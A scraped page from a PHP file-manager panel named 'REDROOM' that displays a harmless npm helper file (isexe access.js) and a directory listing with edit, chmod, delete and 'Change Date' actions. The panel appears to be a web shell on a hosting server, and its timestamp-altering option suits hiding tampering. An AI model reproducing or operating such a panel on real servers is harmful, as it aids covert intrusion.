REDROOM
PHP 8.2.30
Path:
Logout
Edit File
Size: 237 B
Close
/opt/alt/alt-nodejs6/root/usr/lib/node_modules/npm/node_modules/which/node_modules/isexe/access.js
Text
Base64
module.exports = isexe isexe.sync = sync var fs = require('fs') function isexe (path, _, cb) { fs.access(path, fs.X_OK, function (er) { cb(er, !er) }) } function sync (path, _) { fs.accessSync(path, fs.X_OK) return true }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 8
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
.npmignore
23 B
lrw-r--r--
2021-09-28 09:36:07
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
access.js
237 B
lrw-r--r--
2021-09-28 09:36:07
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
index.js
1.24 KB
lrw-r--r--
2021-09-28 09:36:07
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
LICENSE
765 B
lrw-r--r--
2021-09-28 09:36:07
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
mode.js
814 B
lrw-r--r--
2021-09-28 09:36:07
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
package.json
2.05 KB
lrw-r--r--
2021-09-28 09:36:07
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
README.md
1.44 KB
lrw-r--r--
2021-09-28 09:36:07
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
windows.js
735 B
lrw-r--r--
2021-09-28 09:36:07
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).